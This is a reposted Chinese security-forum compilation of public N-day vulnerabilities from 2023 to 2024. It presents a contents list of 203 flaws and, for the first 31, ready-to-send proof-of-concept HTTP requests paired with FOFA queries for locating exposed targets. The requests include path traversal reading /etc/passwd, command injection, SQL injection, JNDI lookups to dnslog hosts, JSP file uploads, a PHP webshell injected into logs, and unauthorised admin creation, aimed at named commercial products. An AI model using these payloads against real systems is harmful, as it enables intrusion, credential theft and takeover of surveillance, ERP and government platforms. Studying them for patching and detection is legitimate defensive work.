中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Author: admin    Time: 2024-6-5 14:31

Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全, 2024-06-05 07:41, Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defence. Defenders can use its contents to check their own exposure.

Sources: The article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: All of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: Because of length constraints, a few POCs that are too long have been replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: If any of the content infringes a party's legal rights, contact the 网络安全新视界 team through the backend to have it removed.

Notice

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

Contents

01
2 ^7 @% w0 q" _+ T2 D' U2 n6 g. N) e! Q
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo endpoint SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus mobile service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management centre session command execution
93. QAX 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰智能 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰智能 S40 management platform web.php import arbitrary file upload
121. Beijing 百绰智能 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 navigation page file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardisation management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友天翼) application virtualisation system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-one login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request, which executes the function and applies base64 encoding:
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友 (Yonyou) NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友 (Yonyou) NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 (Yonyou) NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友 (Yonyou) NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友 (Yonyou) NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友 (Yonyou) NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友 (Yonyou) NC runStateServlet SQL injection
Version: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
